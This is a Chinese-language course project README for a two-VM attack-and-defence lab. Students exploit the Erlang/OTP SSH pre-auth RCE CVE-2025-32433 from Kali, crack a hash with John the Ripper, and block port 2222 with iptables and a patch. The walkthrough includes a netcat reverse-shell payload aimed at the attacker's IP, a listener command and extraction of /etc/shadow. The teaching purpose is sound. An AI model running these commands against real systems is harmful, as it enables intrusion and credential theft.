该项目模拟了一个跨越两台虚拟机的真实攻击与防御场景。你将利用Erlang/OTP SSH服务器中的一个关键预认证远程代码执行漏洞(CVE-2025-32433),破解提取出的密码哈希,然后通过防火墙规则和补丁加固受害机器。
总分:20分 | 截止日期:不接受迟交
本项目模拟了跨两台虚拟机的真实攻击与防御场景。你将利用 Erlang/OTP SSH 服务器中的一个关键预认证 RCE 漏洞(CVE-2025-32433),破解提取的密码哈希,然后通过防火墙规则和补丁加固受害者机器。
| 角色 | 操作系统 |
|---|---|
| 攻击者 | Kali Linux |
| 受害者 | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| 文件 | 描述 |
|---|---|
Debian-1.ova | 预构建的受害者虚拟机镜像 — 需单独下载,参见资源 (因过大无法放在 GitHub 上) |
Project Spring 2026 - Google Docs.pdf | 包含成果物的完整项目说明 |
rockyou_txt.txt | 用于配合 John the Ripper 破解提取密码哈希的字典文件 |
Debian-1.ova): 下载链接 — 文件约 3GB,无法托管在 GitHub 上。请单独下载并按以下说明导入 VirtualBox/VMware。rockyou_txt.txt): 包含在该仓库中,用于第 2 部分的密码破解步骤。Debian-1.ova 和你的 Kali Linux 虚拟机加载到 VirtualBox/VMware 中。ifconfig 查找其 IP(通常在 192.168.56.0/24 网段)。nmap -p 2222 -sV -A <victim-IP>
记录开放端口、服务版本和 Erlang 签名。
临时将 Kali 切换为 NAT 以克隆仓库,然后切回仅主机模式。
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
编辑脚本 — 设置 HOST = "<victim-IP>" 并更新载荷:
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
终端 1(Kali) — 启动监听器:
nc -lvnp 4444
终端 2(Kali) — 发起利用:
python3 CVE-2025-32433.py
在反弹 shell 中,运行 whoami 和 hostname 确认访问权限。
# 在受害者端(通过反弹 shell)
cat /etc/shadow | grep testuser > hash.txt
# 在 Kali 端
john --wordlist=rockyou_txt.txt hash.txt
记录哈希格式(例如 $6$ = SHA-512)、所用时间以及恢复出的明文密码。
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
在 Kali 上重新运行 Nmap 扫描和漏洞利用 — 记录端口 2222 现在显示为 "Filtered"(已过滤)且利用失败。
记录将 Erlang/OTP 升级到 v27.3.3 或更高版本(包含 CVE-2025-32433 修复程序)的步骤。
whoami/hostname)、Flag 获取CVE-2025-32433 — Erlang/OTP SSH 服务器中的关键预认证远程代码执行漏洞。攻击者可在任何凭据交换之前发送格式错误的 SSH 数据包加以利用,从而获得未经认证的攻击者完整的 shell 访问权限。